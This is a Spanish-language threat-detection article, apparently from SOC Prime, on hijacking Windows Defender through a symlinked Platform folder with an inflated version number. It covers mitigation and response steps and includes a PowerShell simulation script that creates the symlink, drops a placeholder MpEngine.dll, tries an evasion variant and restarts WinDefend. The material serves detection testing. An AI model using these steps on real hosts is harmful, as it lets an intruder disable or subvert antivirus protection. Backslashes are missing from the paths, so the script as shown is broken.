SOC Prime Bias: Crítico

14 Jan 2026 14:55 UTC

Rompe La Cáscara Protectora De Windows Defender Con La Técnica De Redirección De Carpetas

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Rompe La Cáscara Protectora De Windows Defender Con La Técnica De Redirección De Carpetas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El artículo demuestra un método de secuestro de Windows Defender que abusa de la redirección de carpetas colocando un directorio de enlace simbólico dentro de la ruta de la Plataforma de Defender y apuntándolo a una ubicación controlada por el atacante. Al asignar al directorio symlink un número de “versión” más alto que el directorio legítimo de la plataforma, Defender puede seleccionar la ruta controlada por el atacante después de reiniciar y cargar sus componentes desde allí. Esto crea oportunidades para la carga lateral de DLL, eliminación selectiva de archivos o incluso la interrupción operativa del servicio Defender.

Investigación

El flujo de trabajo del autor copia la carpeta de la plataforma activa de Defender en un directorio temporal controlado por el atacante, luego crea un enlace simbólico en la ubicación de la Plataforma (a través de mklink /D) usando un identificador de versión fabricado y más alto. Después de un reinicio, se observa que Defender se ejecuta desde el directorio redirigido, lo que permite manipulaciones posteriores como el secuestro de DLL o la eliminación de binarios para interferir con el inicio y la protección de Defender.

Mitigación

Minimice el riesgo limitando estrictamente los permisos de escritura en el directorio de la Plataforma de Windows Defender y monitoreando la creación sospechosa de enlaces simbólicos o subcarpetas de “estilo versión” inesperadas. Implemente controles de integridad para los binarios de Defender y alerte sobre cambios en las rutas de ejecución o el comportamiento de selección de directorios de la plataforma. Cuando sea factible, aplique Windows Defender Application Control (WDAC) o políticas de endurecimiento equivalentes para prevenir cambios no autorizados en ubicaciones del sistema protegidas.

Respuesta

Alerta cuando aparezcan nuevas carpetas de enlace simbólico bajo C:ProgramDataMicrosoftWindows DefenderPlatform o cuando se use mklink para apuntar a ese directorio. Valide la integridad de los archivos de Defender y confirme que los binarios en ejecución provengan de la carpeta de plataforma esperada. Si se confirma la manipulación, elimine el symlink malicioso y restaure los archivos de la plataforma Defender desde una fuente confiable, luego reinicie los servicios de Defender y revalide las protecciones en todo el host.

Flujo de ataque

Ejecución de Simulación

Prerequisito: El Chequeo de Telemetría y Línea Base Previa debe haber pasado.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar exactamente la telemetría esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.

  • Narrativa y Comandos de Ataque:
    El adversario ha comprometido una cuenta de usuario de bajo privilegio en el host objetivo. Su objetivo es cargar una carga maliciosa cuando Windows Defender se inicie, redirigiendo la carpeta de “Plataforma” de Defender a una ubicación que controlan. Realizan los siguientes pasos:

    1. Crear un directorio de preparación (C:TMPAV) que contendrá las DLLs maliciosas.
    2. Poblar el directorio de preparación con una DLL diseñada llamada MpEngine.dll (el nombre esperado por Defender).
    3. Crear un enlace simbólico de directorio llamado C:ProgramDataMicrosoftWindows DefenderPlatform{aleatorio} que apunta al directorio de preparación, usando tanto la utilidad nativa mklink (para activar la regla de Sigma) y la de PowerShell New‑Item (para probar la evasión de la regla).
    4. Reiniciar el Servicio de Windows Defender para forzar la carga desde la ruta secuestrada.
  • Script de Prueba de Regresión:

    # ==============================
    #  Simulación de Secuestro de Carpeta
    # ==============================
    $defenderPlatform = "C:ProgramDataMicrosoftWindows DefenderPlatform"
    $attackerStaging = "C:TMPAV"
    $linkName = "$defenderPlatformHijackTarget"
    
    # 1. Prepare el directorio de preparación
    New-Item -Path $attackerStaging -ItemType Directory -Force | Out-Null
    
    # 2. Deje caer una DLL maliciosa ficticia (marcador de posición)
    $dummyDll = "$attackerStagingMpEngine.dll"
    Set-Content -Path $dummyDll -Value "CONTENIDO DE DLL MALICIOSO" -Encoding ASCII
    
    # 3a. Crear enlace simbólico vía mklink nativo (activa la regla de Sigma)
    cmd /c "mklink /D `"$linkName`" `"$attackerStaging`""
    
    # 3b. Crear enlace simbólico vía PowerShell (prueba evasión)
    $psLink = "$defenderPlatformHijackTarget_PS"
    New-Item -ItemType SymbolicLink -Path $psLink -Target $attackerStaging -Force
    
    # 4. Reiniciar Servicio de Windows Defender (requiere admin)
    # Nota: Este paso puede ser bloqueado en un entorno fortalecido; incluido para completitud.
    Restart-Service -Name "WinDefend" -Force
  • Comandos de Limpieza:

    # Eliminar enlaces simbólicos creados y archivos de preparación
    $links = @(
        "C:ProgramDataMicrosoftWindows DefenderPlatformHijackTarget",
        "C:ProgramDataMicrosoftWindows DefenderPlatformHijackTarget_PS"
    )
    foreach ($l in $links) {
        if (Test-Path $l) { Remove-Item $l -Force }
    }
    
    $staging = "C:TMPAV"
    if (Test-Path $staging) { Remove-Item $staging -Recurse -Force }
    
    # Opcionalmente restaure la carpeta de la plataforma Defender si es necesario (no requerido para la simulación)